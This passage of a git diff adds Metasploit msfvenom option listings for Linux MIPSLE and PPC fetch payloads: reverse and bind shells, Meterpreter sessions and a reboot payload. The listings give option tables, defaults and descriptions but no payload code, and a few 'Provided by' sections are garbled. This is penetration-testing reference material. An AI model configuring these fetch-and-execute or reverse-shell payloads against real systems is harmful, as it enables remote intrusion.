https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-reboot.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-reboot.txt new file mode 100644 index 0000000..e154ba7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-reboot.txt @@ -0,0 +1,68 @@ + + Name: HTTP Fetch, Linux Reboot + Module: payload/cmd/linux/http/mipsle/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HqyjVOMSY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-shell-reverse_tcp.txt new file mode 100644 index 0000000..1f38a47 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-shell-reverse_tcp.txt @@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/mipsle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fHMIGJaY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-shell_bind_tcp.txt new file mode 100644 index 0000000..63a6df9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-shell_bind_tcp.txt @@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/mipsle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME buADmLwtKq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsle-shell_reverse_tcp.txt new file mode 100644 index 0000000..8c1623f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsle-shell_reverse_tcp.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/mipsle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iVIVTZUyras no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_http.txt new file mode 100644 index 0000000..feb8f7b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/ppc/meterpreter_reverse_http: +========================= + +ent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wlvJAncdY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_https.txt new file mode 100644 index 0000000..c83c1fc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/ppc/meterpreter_reverse_https: +========================= + +t_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME lthBvzzMnq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..74522e1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/ppc/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME GaFcxwZUmDD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-ppc64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-ppc64-shell_bind_tcp.txt new file mode 100644 index 0000000..0e11d4f --- /dev/null +++ 